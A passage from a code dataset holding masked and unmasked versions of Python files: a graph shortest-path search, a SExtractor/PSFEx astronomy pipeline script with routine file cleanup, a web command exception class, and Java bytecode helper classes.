1, 4)\n print(path)\n\n\nmain()\n",
"step-4": "from Graph import create_random_graph\n\n\ndef find_accessible_vertices_backwards(graph, end_vertex):\n if end_vertex not in graph.parse_vertices():\n raise ValueError('The end vertex is not in the graph.')\n visited = []\n queue = []\n next_vertex = {}\n distance_to_end = {}\n queue.append(end_vertex)\n visited.append(end_vertex)\n distance_to_end[end_vertex] = 0\n while len(queue) > 0:\n y = queue[0]\n queue = queue[1:]\n for edge in graph.parse_inbound_edges(y):\n if edge.source_id not in visited:\n visited.append(edge.source_id)\n queue.append(edge.source_id)\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\n next_vertex[edge.source_id] = y\n return next_vertex\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\nmain()\n",
"step-5": "from Graph import create_random_graph\r\n\r\n\r\ndef find_accessible_vertices_backwards(graph, end_vertex):\r\n if end_vertex not in graph.parse_vertices():\r\n raise ValueError(\"The end vertex is not in the graph.\")\r\n\r\n visited = []\r\n queue = []\r\n next_vertex = {}\r\n distance_to_end = {}\r\n\r\n queue.append(end_vertex)\r\n visited.append(end_vertex)\r\n distance_to_end[end_vertex] = 0\r\n while len(queue) > 0:\r\n y = queue[0]\r\n queue = queue[1:]\r\n for edge in graph.parse_inbound_edges(y):\r\n if edge.source_id not in visited:\r\n visited.append(edge.source_id)\r\n queue.append(edge.source_id)\r\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\r\n next_vertex[edge.source_id] = y\r\n\r\n return next_vertex\r\n\r\n\r\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\r\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\r\n\r\n if start_vertex not in next_vertex.keys():\r\n raise ValueError(\"There is no path from \" + str(start_vertex) + \" to \" + str(end_vertex))\r\n\r\n path = [start_vertex]\r\n last_vertex = start_vertex\r\n reached_end = False\r\n while not reached_end:\r\n path.append(next_vertex[last_vertex])\r\n last_vertex = next_vertex[last_vertex]\r\n if path[-1] == end_vertex:\r\n reached_end = True\r\n\r\n return path\r\n\r\n\r\ndef main():\r\n random_graph = create_random_graph(5, 10)\r\n\r\n print(\"THE GRAPH:\")\r\n for vertex in random_graph.parse_vertices():\r\n for edge in random_graph.parse_outbound_edges(vertex):\r\n print(edge)\r\n\r\n print(\"\\n\")\r\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\r\n print(next_vertex.keys())\r\n print(\"\\n\")\r\n\r\n path = find_minimum_length_path(random_graph, 1, 4)\r\n print(path)\r\n\r\n\r\nmain()",
"step-ids": [
1,
2,
4,
5,
6
]
}
|
[
1,
2,
4,
5,
6
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
|
normal
|
{
"blob_id": "c23125018a77508dad6fd2cb86ec6d556fbd1019",
"index": 90,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\n<mask token>\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-3": "<mask token>\nstart_time = time.time()\n<mask token>\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-4": "<mask token>\nimport time\nstart_time = time.time()\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\nimport init_cfg as ic\nos.system('psfex -dd > config.psfex')\nif ic.use_backsub:\n prefix = 'b'\nelse:\n prefix = ''\nf = open('psfex_all.sh', 'w')\nf.write('\\n')\nf.write('#############################' + '\\n')\nf.write('##### Scripts for PSFEx #####' + '\\n')\nf.write('#############################' + '\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\\n')\n f.write('\\n')\n for j in np.arange(len(ic.filters)):\n flt = ic.filters[j].split('-')[1]\n f.write('rm -rfv prepsfex_' + flt + '.cat\\n')\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +\n '.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +\n '-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')\n f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(\n ic.THRES_psf))\n f.write(\n f\"\"\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n\"\"\"\n )\n f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')\n f.write(\n f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')\n f.write(\n f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '\n )\n f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +\n '-' + flt + '.cat ')\n f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +\n flt + '.xml\\n')\n f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +\n flt + '.psf\\n')\n f.write('\\n')\n f.write('\\n\\n')\nf.close()\nif glob.glob('PSFEx/') == []:\n os.system('mkdir PSFEx')\nelse:\n os.system('rm -rfv PSFEx/*')\nos.system('sh psfex_all.sh')\nos.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')\nos.system('mv -v prepsfex_*-*.cat PSFEx/')\nos.system('rm -rfv ./*.fits prepsfex_*.cat')\nprint('--- %s seconds ---' % (time.time() - start_time))\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 21 11:40:26 2020\n\n@author: jlee\n\"\"\"\n\n\nimport time\nstart_time = time.time()\n\nimport numpy as np\nimport glob, os\nfrom astropy.io import fits\n\nimport init_cfg as ic\n\n\n# ----- Making scripts for PSFEx ----- #\nos.system(\"psfex -dd > config.psfex\")\n\nif ic.use_backsub:\n\tprefix = 'b'\nelse:\n\tprefix = ''\n\nf = open('psfex_all.sh','w')\nf.write('\\n')\nf.write('#############################'+'\\n')\nf.write('##### Scripts for PSFEx #####'+'\\n')\nf.write('#############################'+'\\n')\nf.write('\\n')\nfor i in np.arange(len(ic.fields)):\n\tf.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\\n')\n\tf.write('\\n')\n\tfor j in np.arange(len(ic.filters)):\n\t\tflt = ic.filters[j].split('-')[1]\n\t\tf.write('rm -rfv prepsfex_'+flt+'.cat\\n')\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')\n\t\tf.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))\n\t\tf.write(f\"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\\n\")\n\t\tf.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')\n\t\tf.write(f\"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} \")\n\t\tf.write(f\"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} \")\n\t\tf.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')\n\t\tf.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\\n')\n\t\tf.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\\n')\n\t\tf.write('\\n')\n\tf.write('\\n\\n')\nf.close()\n\n\n# ----- Running scripts for PSFEx ----- #\nif (glob.glob(\"PSFEx/\") == []):\n\tos.system(\"mkdir PSFEx\")\nelse:\n\tos.system(\"rm -rfv PSFEx/*\")\n\nos.system(\"sh psfex_all.sh\")\n\nos.system(\"mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/\")\nos.system(\"mv -v prepsfex_*-*.cat PSFEx/\")\nos.system(\"rm -rfv ./*.fits prepsfex_*.cat\")\n\n\n# Printing the running time \nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/web_client_api/__init__.py
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
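
A minimal illustration of how such a command exception might be raised and handled; the dispatcher below is hypothetical and not part of the game client, and it assumes `SoftException` behaves like a normal Exception subclass.

def handle_web_command(command):
    # Hypothetical dispatcher: unknown commands surface as WebCommandException.
    known = {'ping': lambda: 'pong'}
    if command not in known:
        raise WebCommandException('Unknown web command: %s' % command)
    return known[command]()

try:
    handle_web_command('teleport')
except WebCommandException as exc:
    print('web command failed: %s' % exc)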
|
normal
|
{
"blob_id": "0f4864b745768994ea55a931e4d8b0681c058465",
"index": 2828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass WebCommandException(SoftException):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-4": "from soft_exception import SoftException\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-5": "# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/web_client_api/__init__.py\nfrom soft_exception import SoftException\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW(self.classname),
JavaOpcodes.DUP()
)
class Init:
def __init__(self, classname, *args):
self.classname = classname
self.args = args
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKESPECIAL(
self.classname,
'<init>',
args=self.args,
returns='V'
),
)
class Yield:
def __init__(self, yield_point):
self.yield_point = yield_point
def process(self, context):
context.add_opcodes(
ICONST_val(self.yield_point),
JavaOpcodes.INVOKEVIRTUAL(
'org/python/types/Generator',
'yield',
args=['Ljava/util/Map;', 'I'],
returns='V'
),
# "yield" by returning from the generator method.
JavaOpcodes.ARETURN()
)
##########################################################################
# Java types and their operations
##########################################################################
class Array:
def __init__(self, size, classname='org/python/Object', fill=None):
self.size = size
self.classname = classname
self.fill = fill
def process(self, context):
context.add_opcodes(
ICONST_val(self.size),
JavaOpcodes.ANEWARRAY(self.classname),
)
if self.fill:
for i in range(self.size):
context.add_opcodes(
JavaOpcodes.DUP(),
ICONST_val(i),
self.fill,
JavaOpcodes.AASTORE(),
)
class List:
def __init__(self, size=None):
self.size = size
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/ArrayList'),
JavaOpcodes.DUP(),
)
if self.size:
context.add_opcodes(
ICONST_val(self.size),
Init('java/util/ArrayList', 'I')
)
else:
context.add_opcodes(
Init('java/util/ArrayList')
)
class add:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/List',
'add',
args=['Ljava/lang/Object;'],
returns='Z'
),
JavaOpcodes.POP(),
)
class Map:
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/HashMap'),
JavaOpcodes.DUP(),
Init('java/util/HashMap')
)
class get:
def __init__(self, key):
self.key = key
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.key),
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'get',
args=['Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
)
)
class put:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'put',
args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
),
JavaOpcodes.POP()
)
class putAll:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'putAll',
args=['Ljava/util/Map;'],
returns='V'
),
)
class Class:
class forName:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.classname),
JavaOpcodes.INVOKESTATIC(
'java/lang/Class',
'forName',
args=['Ljava/lang/String;'],
returns='Ljava/lang/Class;'
),
)
class THROW:
# Raise an exception of given type with given arguments
# Example:
# THROW(
# 'org/python/exceptions/AttributeError',
# ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
# )
def __init__(self, exception_class, *exception_args):
self.exception_class = exception_class
self.exc_arg_types = [e[0] for e in exception_args]
self.exc_arg_values = [e[1] for e in exception_args]
def process(self, context):
context.add_opcodes(
New(self.exception_class),
*self.exc_arg_values
)
context.add_opcodes(
Init(self.exception_class, *self.exc_arg_types),
JavaOpcodes.ATHROW(),
)
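
These helpers all follow the same convention: construct the op, then call `process(context)`, which pushes JVM opcodes (and composite ops like `Init`) through `context.add_opcodes()`. A toy context that merely records what it receives is enough to see, for example, what the `Map` helper expands to; the stub below is an illustration only, not the compiler's real context class, which would expand composite ops further.

class _StubContext:
    # Minimal stand-in: just records whatever opcodes/ops are emitted.
    def __init__(self):
        self.ops = []

    def add_opcodes(self, *ops):
        self.ops.extend(ops)

ctx = _StubContext()
Map().process(ctx)       # records NEW java/util/HashMap, DUP, Init('java/util/HashMap')
Map.put().process(ctx)   # records INVOKEINTERFACE java/util/Map.put, POP
print(ctx.ops)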
|
normal
|
{
"blob_id": "67e0536dc9f38ab82fe30e715599fed93c5425a5",
"index": 5142,
"step-1": "<mask token>\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
"step-2": "<mask token>\n\n\nclass Yield:\n\n def __init__(self, yield_point):\n self.yield_point = yield_point\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.yield_point), JavaOpcodes.\n INVOKEVIRTUAL('org/python/types/Generator', 'yield', args=[\n 'Ljava/util/Map;', 'I'], returns='V'), JavaOpcodes.ARETURN())\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
